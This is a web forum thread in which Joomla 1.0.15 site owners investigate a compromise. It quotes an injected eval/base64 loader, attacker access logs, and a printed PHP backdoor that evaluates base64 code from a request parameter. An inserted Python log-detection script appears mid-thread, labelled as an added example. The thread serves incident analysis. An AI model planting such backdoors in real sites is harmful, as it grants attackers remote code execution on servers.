The Joomla! Forum ™



PostPosted: Mon Sep 27, 2010 4:00 am
Joomla! Apprentice

Joined: Mon Apr 03, 2006 9:08 am
Posts: 22
Location: Hong Kong
I have a Joomla 1.0.15 site. It was hacked. When it is accessed, it is redirected to a suspicious site. When I looked at the source of my site, I found all the php files had been changed. A piece of suspicious code was added to the beginning of every php file. It looks like

Code:
<?php /**/ eval(base64_decode(".........."));?>

Does anyone have any clue how this happens?

Thanks in advance.

Wai


PostPosted: Mon Sep 27, 2010 4:30 am
Joomla! Guru

Joined: Sun Oct 29, 2006 10:51 am
Posts: 849
Location: Fiji
Hi qqwwong,

Your website could have been hacked in a number of different ways, i.e. there is nothing in the information you have provided that hints at any particular exploit.

It may be that an extension installed on your website had a vulnerability that was exploited, or maybe your host hasn't properly secured their server. Maybe the computer you use was infected with malware that grabbed your password from somewhere you stored it (an FTP client perhaps?), or maybe as you typed it in (a keylogger). Maybe the network you accessed your site from was compromised and the passwords simply pulled off the wire (they are sent in plain text if you don't use SSL for your admin).

Basically, there are numerous ways a website can be compromised.

I would suggest wiping your server clean... i.e. remove all files and databases, and reinstall from a clean backup. Change all your FTP, cPanel, and Joomla passwords.

I would also consider migrating to Joomla 1.5 since I doubt the extensions you use on your website are still being actively maintained and patched.

I'm sorry this happened to you; I know how it feels. That said, I can offer nothing more than the old advice, "backup! backup! backup!" Hopefully you already knew that and have a good backup you can restore from.

Good luck!
-Mark

_________________
http://twitter.com/mark_up.
Opinions expressed are mine alone and don't necessarily represent the views of any organisation I am associated with.


PostPosted: Thu Sep 30, 2010 2:01 pm
Joomla! Enthusiast

Joined: Thu Mar 12, 2009 11:34 am
Posts: 102
Hi,

We have the same problem on a site in Joomla 1.0.15.

A Russian guy has the same problem too:

http://joomlaforum.ru/index.php?topic=131149.0

With a password (htpasswd) on the administrator site it will block the attack.

On my site I have (web log):

81.180.71.42 xxxxxxxxxxxxxxxxxxx - [13/Sep/2010:14:41:25 +0200] "GET /administrator/index.php HTTP/1.1" 200 992 "-" "Opera/9.51 (Windows NT 5.1; U; en)"
81.180.71.42 xxxxxxxxxxxxxxxxxxx - [13/Sep/2010:14:41:26 +0200] "POST /administrator/index.php HTTP/1.1" 200 69 "-" "Opera/9.51 (Windows NT 5.1; U; en)"
81.180.71.42 xxxxxxxxxxxxxxxxxxx - [13/Sep/2010:14:41:27 +0200] "GET /administrator/index2.php?option=com_installer&element=mambot HTTP/1.1" 200 6896 "-" "Opera/9.51 (Windows NT 5.1; U; en)"
81.180.71.42 xxxxxxxxxxxxxxxxxxx - [13/Sep/2010:14:41:29 +0200] "POST /administrator/index2.php HTTP/1.1" 200 4689 "-" "Opera/9.51 (Windows NT 5.1; U; en)"
81.180.71.42 xxxxxxxxxxxxxxxxxxx - [13/Sep/2010:14:41:30 +0200] "GET /administrator/index2.php?option=com_installer&element=mambot HTTP/1.1" 200 6938 "-" "Opera/9.51 (Windows NT 5.1; U; en)"
81.180.71.42 xxxxxxxxxxxxxxxxxxx - [13/Sep/2010:14:41:31 +0200] "POST /mambots/system/loginJ00mla.php HTTP/1.1" 200 36 "-" "Opera/9.51 (Windows NT 5.1; U; en)"
81.180.71.42 xxxxxxxxxxxxxxxxxxx - [13/Sep/2010:14:41:32 +0200] "POST /administrator/index2.php HTTP/1.1" 301 20 "-" "Opera/9.51 (Windows NT 5.1; U; en)"
81.180.71.42 xxxxxxxxxxxxxxxxxxx - [13/Sep/2010:14:41:32 +0200] "GET /administrator/index2.php?option=com_installer&element=mambot&mosmsg=SUCCES+ HTTP/1.1" 200 6893 "-" "Opera/9.51 (Windows NT 5.1; U; en)"

But I have no log on the FTP side.

I don't know how they put this there: /mambots/system/loginJ00mla.php

Stéphane
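As an added example (not part of Stéphane's post), a small Python checker that parses the access-log lines above and flags the three things visible in them: a back-end login immediately followed by com_installer use, the "SUCCES" install message, and a POST straight to a script under /mambots/. The list of extension directories and the two-minute window are assumptions for this example.

```python
import re
from datetime import datetime, timedelta

# Apache combined log format; the second field is the identity field masked in the post.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<url>\S+) \S+" '
                    r'(?P<status>\d{3}) \S+ "[^"]*" "[^"]*"$')
# Joomla 1.0.x extension directories: they hold PHP, but a browser never POSTs to them
# directly in normal use (assumption made for this example).
EXTENSION_DIRS = ("/mambots/", "/components/", "/modules/", "/templates/")

def parse_line(line):
    """Parse one combined-format line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    e = m.groupdict()
    e["ts"] = datetime.strptime(e["ts"], "%d/%b/%Y:%H:%M:%S %z")
    e["path"], _, e["query"] = e["url"].partition("?")
    return e

def detect(lines, window=timedelta(minutes=2)):
    """Return (timestamp, ip, rule, url) findings for the three patterns visible in the log."""
    findings, last_login = [], {}
    for raw in lines:
        e = parse_line(raw)
        if e is None:
            continue
        if e["method"] == "POST" and e["path"] == "/administrator/index.php":
            last_login[e["ip"]] = e["ts"]                 # back-end login form submitted
        if e["method"] == "POST" and e["path"].startswith(EXTENSION_DIRS):
            findings.append((e["ts"], e["ip"], "POST to extension script", e["url"]))
        if "option=com_installer" in e["query"]:
            t = last_login.pop(e["ip"], None)             # report each login/installer pair once
            if t is not None and e["ts"] - t <= window:
                findings.append((e["ts"], e["ip"], "installer used right after login", e["url"]))
            if "mosmsg=SUCCES" in e["query"]:
                findings.append((e["ts"], e["ip"], "extension install reported success", e["url"]))
    return findings

# The access-log lines posted in the thread, used here as sample input.
SAMPLE_LOG = """\
81.180.71.42 xxxxxxxxxxxxxxxxxxx - [13/Sep/2010:14:41:25 +0200] "GET /administrator/index.php HTTP/1.1" 200 992 "-" "Opera/9.51 (Windows NT 5.1; U; en)"
81.180.71.42 xxxxxxxxxxxxxxxxxxx - [13/Sep/2010:14:41:26 +0200] "POST /administrator/index.php HTTP/1.1" 200 69 "-" "Opera/9.51 (Windows NT 5.1; U; en)"
81.180.71.42 xxxxxxxxxxxxxxxxxxx - [13/Sep/2010:14:41:27 +0200] "GET /administrator/index2.php?option=com_installer&element=mambot HTTP/1.1" 200 6896 "-" "Opera/9.51 (Windows NT 5.1; U; en)"
81.180.71.42 xxxxxxxxxxxxxxxxxxx - [13/Sep/2010:14:41:29 +0200] "POST /administrator/index2.php HTTP/1.1" 200 4689 "-" "Opera/9.51 (Windows NT 5.1; U; en)"
81.180.71.42 xxxxxxxxxxxxxxxxxxx - [13/Sep/2010:14:41:30 +0200] "GET /administrator/index2.php?option=com_installer&element=mambot HTTP/1.1" 200 6938 "-" "Opera/9.51 (Windows NT 5.1; U; en)"
81.180.71.42 xxxxxxxxxxxxxxxxxxx - [13/Sep/2010:14:41:31 +0200] "POST /mambots/system/loginJ00mla.php HTTP/1.1" 200 36 "-" "Opera/9.51 (Windows NT 5.1; U; en)"
81.180.71.42 xxxxxxxxxxxxxxxxxxx - [13/Sep/2010:14:41:32 +0200] "POST /administrator/index2.php HTTP/1.1" 301 20 "-" "Opera/9.51 (Windows NT 5.1; U; en)"
81.180.71.42 xxxxxxxxxxxxxxxxxxx - [13/Sep/2010:14:41:32 +0200] "GET /administrator/index2.php?option=com_installer&element=mambot&mosmsg=SUCCES+ HTTP/1.1" 200 6893 "-" "Opera/9.51 (Windows NT 5.1; U; en)"
""".splitlines()
```

Running `detect(SAMPLE_LOG)` on the eight lines yields three findings, in order: the installer hit one second after the login POST, the POST to /mambots/system/loginJ00mla.php, and the SUCCES message.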


PostPosted: Sat Oct 02, 2010 1:49 pm
Joomla! Apprentice

Joined: Mon Apr 03, 2006 9:08 am
Posts: 22
Location: Hong Kong
biirc wrote:
Hi,

We have the same problem on a site in Joomla 1.0.15.

A Russian guy has the same problem too:

http://joomlaforum.ru/index.php?topic=131149.0

With a password (htpasswd) on the administrator site it will block the attack.

On my site I have (web log):

81.180.71.42 xxxxxxxxxxxxxxxxxxx - [13/Sep/2010:14:41:25 +0200] "GET /administrator/index.php HTTP/1.1" 200 992 "-" "Opera/9.51 (Windows NT 5.1; U; en)"
81.180.71.42 xxxxxxxxxxxxxxxxxxx - [13/Sep/2010:14:41:26 +0200] "POST /administrator/index.php HTTP/1.1" 200 69 "-" "Opera/9.51 (Windows NT 5.1; U; en)"
81.180.71.42 xxxxxxxxxxxxxxxxxxx - [13/Sep/2010:14:41:27 +0200] "GET /administrator/index2.php?option=com_installer&element=mambot HTTP/1.1" 200 6896 "-" "Opera/9.51 (Windows NT 5.1; U; en)"
81.180.71.42 xxxxxxxxxxxxxxxxxxx - [13/Sep/2010:14:41:29 +0200] "POST /administrator/index2.php HTTP/1.1" 200 4689 "-" "Opera/9.51 (Windows NT 5.1; U; en)"
81.180.71.42 xxxxxxxxxxxxxxxxxxx - [13/Sep/2010:14:41:30 +0200] "GET /administrator/index2.php?option=com_installer&element=mambot HTTP/1.1" 200 6938 "-" "Opera/9.51 (Windows NT 5.1; U; en)"
81.180.71.42 xxxxxxxxxxxxxxxxxxx - [13/Sep/2010:14:41:31 +0200] "POST /mambots/system/loginJ00mla.php HTTP/1.1" 200 36 "-" "Opera/9.51 (Windows NT 5.1; U; en)"
81.180.71.42 xxxxxxxxxxxxxxxxxxx - [13/Sep/2010:14:41:32 +0200] "POST /administrator/index2.php HTTP/1.1" 301 20 "-" "Opera/9.51 (Windows NT 5.1; U; en)"
81.180.71.42 xxxxxxxxxxxxxxxxxxx - [13/Sep/2010:14:41:32 +0200] "GET /administrator/index2.php?option=com_installer&element=mambot&mosmsg=SUCCES+ HTTP/1.1" 200 6893 "-" "Opera/9.51 (Windows NT 5.1; U; en)"

But I have no log on the FTP side.

I don't know how they put this there: /mambots/system/loginJ00mla.php

Stéphane


Hi Stéphane,

Thank you for your message. I had exactly the same problem, and found the strange file "loginJ00mla.php". I found the timestamp of this file is different from the timestamp on all other php files that had been modified. I'm still not able to figure out how the file was injected into the system. I already added a password to protect the admin back-end page.

Wai


PostPosted: Sat Oct 02, 2010 2:31 pm
Joomla! Guru

Joined: Sun Oct 29, 2006 10:51 am
Posts: 849
Location: Fiji
Have you checked the extensions on your site against the Joomla Vulnerable Extensions list? Maybe you have a vulnerable extension installed.

_________________
http://twitter.com/mark_up.
Opinions expressed are mine alone and don't necessarily represent the views of any organisation I am associated with.


PostPosted: Sat Oct 02, 2010 2:54 pm
Joomla! Master

Joined: Mon Mar 20, 2006 1:56 am
Posts: 12414
Location: The Girly Side of Joomla in Sussex
Apart from the extensions, I would also check the folder permissions. I do notice the mambot phrase, which indicates it's a very old system; perhaps you are using Mambo extensions or even Mambo itself!

Run through this checklist and perhaps provide information on your installs, e.g. Joomla 1.0.13 etc.

[ ] Run the forum post assistant and security tool. Instructions available here.

[ ] Ensure you have the latest version of Joomla. Delete all files in your Joomla installation. Replace the deleted files with fresh copies of a current full version of Joomla, and fresh copies of extensions and templates used. Only by replacing all files in the installation (including extensions and templates) can you be sure to remove the backdoors inserted and hidden in files and directories.

[ ] Review the Vulnerable Extensions List.

[ ] Review and action Security Checklist 7 to make sure you've gone through all of the steps.

[ ] Change all passwords and, if possible, user names for the website host control panel and your Joomla site.

[ ] Use proper permissions on files and directories. They should never be 777; ideal is 644 and 755.

[ ] Check your htaccess for any odd code (i.e. code which is not in the standard htaccess supplied as part of the Joomla installation).

[ ] Check the crontab or Task Scheduler for unexpected jobs/tasks.

If you feel none of the above applies to you, read these admin tips and the "what went wrong" post.

_________________
HU2HY- Poor questions = Poor answer
Unrequested help PMs will be added to the foe list and possibly just deleted
{Community.Connect Administrator }{ Showcase & Security Moderator}


PostPosted: Mon Oct 04, 2010 10:28 am
Joomla! Intern

Joined: Wed Oct 28, 2009 12:14 pm
Posts: 89
Hello! We had the same problem. We think we found the point of entry -> com_mtree. Do you have that component installed? If so I would recommend upgrading it.


PostPosted: Mon Oct 04, 2010 3:26 pm
Joomla! Apprentice

Joined: Mon Apr 03, 2006 9:08 am
Posts: 22
Location: Hong Kong
VegardAa wrote:
Hello! We had the same problem. We think we found the point of entry -> com_mtree. Do you have that component installed? If so I would recommend upgrading it.


Thank you for all your replies. I don't have this particular component installed. I'm now checking the extensions of the site against the Vulnerable Extensions List.
I had such an old version of Joomla because my client was unwilling to upgrade, because the site worked for them. This time, they are convinced to upgrade to 1.5.x. Hope that can be done as soon as possible. Meanwhile, I have used an .htaccess password to protect the administrator page.


PostPosted: Mon Oct 04, 2010 7:22 pm
Joomla! Master

Joined: Mon Mar 20, 2006 1:56 am
Posts: 12414
Location: The Girly Side of Joomla in Sussex
Please note: most of the VEL entries are 1.5.x only, BUT some may work or be based on those for 1.0.x.

_________________
HU2HY- Poor questions = Poor answer
Unrequested help PMs will be added to the foe list and possibly just deleted
{Community.Connect Administrator }{ Showcase & Security Moderator}


PostPosted: Tue Oct 05, 2010 1:42 pm
Joomla! Enthusiast

Joined: Thu Mar 12, 2009 11:34 am
Posts: 102
Hi,

This is the list of the components, modules and mambots we have:

Components:
- GMAccess
- JCal Pro
- JCE Admin
- JooMap
- JPortfolio
- Mambotheme Groups
- ReMOSitory
- Sigsiu Online Business Index 2

Modules:
- mod_jcalpro_latest

Mambots:
- Easy eXtended Gallery
- MOS Document
- MosModule
- Multithumb
- Simple Image Gallery Plugin
- XTypo
- Searchbot for Sigsiu Online Business Index 2
- JCE Utilities 1.5.0

I don't know how the file was injected into the system; I didn't see any attack on the components.
Stéphane


PostPosted: Tue Oct 05, 2010 1:57 pm
Joomla! Master

Joined: Mon Mar 20, 2006 1:56 am
Posts: 12414
Location: The Girly Side of Joomla in Sussex
The fact that you are using mambots clearly indicates that you are using out-of-date and possibly vulnerable extensions.
I would consider migrating to J1.5, or contact each of the developers and ask for the latest J1.0 version, if you are using J1.0.x.

_________________
HU2HY- Poor questions = Poor answer
Unrequested help PMs will be added to the foe list and possibly just deleted
{Community.Connect Administrator }{ Showcase & Security Moderator}


PostPosted: Tue Oct 05, 2010 2:34 pm
Joomla! Enthusiast

Joined: Thu Mar 12, 2009 11:34 am
Posts: 102
Hi, thanks for your answer.
We are in the Joomla! 1.0 » Security - 1.0.x section; I know there are vulnerabilities.
This client called me because they have a problem.
This site uses GMAccess; I will wait for Joomla 1.6 for the upgrade.

I just want to block the attack, but I didn't see any attack on the components or mambots in the log.

81.180.71.42 xxxxxxxxxxxxxxxxxxx - [13/Sep/2010:14:41:31 +0200] "POST /mambots/system/loginJ00mla.php

This is not normal: they installed a mambot and uninstalled it afterwards. How?



Stéphane


PostPosted: Wed Oct 06, 2010 12:41 pm
Joomla! Apprentice

Joined: Mon Apr 03, 2006 9:08 am
Posts: 22
Location: Hong Kong
biirc wrote:
Hi, thanks for your answer.
We are in the Joomla! 1.0 » Security - 1.0.x section; I know there are vulnerabilities.
This client called me because they have a problem.
This site uses GMAccess; I will wait for Joomla 1.6 for the upgrade.

I just want to block the attack, but I didn't see any attack on the components or mambots in the log.

81.180.71.42 xxxxxxxxxxxxxxxxxxx - [13/Sep/2010:14:41:31 +0200] "POST /mambots/system/loginJ00mla.php

This is not normal: they installed a mambot and uninstalled it afterwards. How?



Stéphane


This is certainly not normal. The system should not have this particular php file. When they POST to this file, they are sending something to your system, and this loginJ00mla.php is receiving the posted data, and possibly capturing username and password. This means that there is another way that the hacker installed this file before the time shown in this log entry.

I got exactly the same log entry (different time). I am not able to find out how this php file was installed yet.


PostPosted: Wed Oct 06, 2010 1:41 pm
Joomla! Enthusiast

Joined: Thu Mar 12, 2009 11:34 am
Posts: 102
Hi qqwwong,

I know it's not normal, but I have the same problem.
I am not able to find out how this php file was installed yet.

Nothing in the HTTP log and the FTP log, still searching.

Stéphane


PostPosted: Wed Oct 06, 2010 2:24 pm
Joomla! Master

Joined: Mon Mar 20, 2006 1:56 am
Posts: 12414
Location: The Girly Side of Joomla in Sussex
biirc wrote:
Hi qqwwong,
Nothing in the HTTP log and the FTP log, still searching.
Stéphane

Can I suggest you look around your host's forums and see if anyone else has been hit by this... possibly it's a jailshell break.

_________________
HU2HY- Poor questions = Poor answer
Unrequested help PMs will be added to the foe list and possibly just deleted
{Community.Connect Administrator }{ Showcase & Security Moderator}


PostPosted: Thu Feb 17, 2011 4:55 pm
Joomla! Enthusiast

Joined: Thu Mar 12, 2009 11:34 am
Posts: 102
Hi,
The site of my clients was attacked, but it seems that the last time they put in a back door.

A file at mambots/pluging/login.php:

Code:
defined( 'INFO_MODULES' ) or die( 'Restricted access.' );

with this function:

Code:
function jpimport($e)
{
    if (!isset($_REQUEST['e'])) die( 'Restricted access' );
    else eval(base64_decode($_REQUEST['e']));
}

qqwwong, can you see this file too on your server? Is it in your backup files?

Stéphane.

